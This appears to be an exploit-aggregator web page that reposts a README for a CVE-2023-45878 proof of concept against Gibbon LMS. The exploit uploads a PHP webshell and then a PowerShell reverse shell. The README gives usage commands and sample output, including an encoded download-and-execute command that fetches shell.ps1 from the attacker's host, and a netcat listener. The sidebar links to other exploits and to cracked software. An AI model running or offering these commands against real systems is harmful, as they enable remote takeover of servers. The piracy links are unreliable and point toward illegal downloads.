Exploit for Out-of-bounds Write in Gibbonedu Gibbon exploit

5 days ago 9

BOOK THIS SPACE FOR AD

ARTICLE AD

## https://sploitus.com/exploit?id=B9C9A654-821F-5450-BD25-49C6C09C3224 # CVE-2023-45878-POC CVE-2023-45878 poc for gibbon LMS on xampp windows. Upload a webshell called shell.php for command injection. For reverse shell uploads a powershell reverse shell ps1 script called shell.ps1 which is uploaded to the target machine using the shell.php. # Requirments Python3 Requests python3 module netcat ``` pip3 install requests ``` ## Virtual env ```shell mkdir CVE-2023-45878 cd CVE-2023-45878 python3 -m venv CVE source CVE/bin/activate cd .. pip3 install requests ``` # Usage Tested on Gibbon LMS that was running in XAMPP windows no AV enabled. Target can be found using the login page of Gibbon example http://gibbon-example/Gibbon-LMS/ ## Reverse shell ```shell python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT ``` ### Result ```text [+] PHP shell uploaded successfully to http://target/shell.php [+] PowerShell reverse shell script saved to: shell.ps1 [+] The shell is now hosted at shell.ps1 Starting reverse shell listener in background... Starting netcat listener on ip:REV-PORT... [+] HTTP server running in the background on port SRVPORT [+] Executing PHP shell to download and execute shell.ps1 Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29 [+] HTTP server started on http://0.0.0.0:SRVPORT/ TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 - Connection from TARGET-IP PS C:\xampp\htdocs\Gibbon-LMS> ``` ## Single command ```shell python3 reverse.py --single -target_url http://target -command whoami ``` ### Result ```text [+] PHP shell uploaded successfully to http://target/shell.php [+] Executing PHP command Executing: http://target/shell.php?whoami [+] Command executed successfully pres enter vuln\w.webservice ``` # Credits https://herolab.usd.de/security-advisories/usd-2023-0025/

Read Entire Article

LEFT SIDEBAR AD

Exploit for Out-of-bounds Write in Gibbonedu Gibbon exploit

BOOK THIS SPACE FOR AD

Related

Exploit for CVE-2025-29927 exploit

Exploit for Deserialization of Untrusted Data in Apache Tomcat exploit

Exploit for CVE-2024-32962 exploit

[webapps] FluxBB 1.5.11 - Stored Cross-Site Scripting (XSS)

[webapps] JUX Real Estate 3.4.0 - SQL Injection

Tripp Lite SU750XL UPS Privilege Escalation / Missing Authentication exploit

Trending

Popular

Install waybackurls on Kali Linux

1-click RCE in Electron Applications

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

The best Mini LED TV I've tested isn't made by LG or TCL, and it's on sale for Black Friday

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

BOOK THIS SPACE FOR AD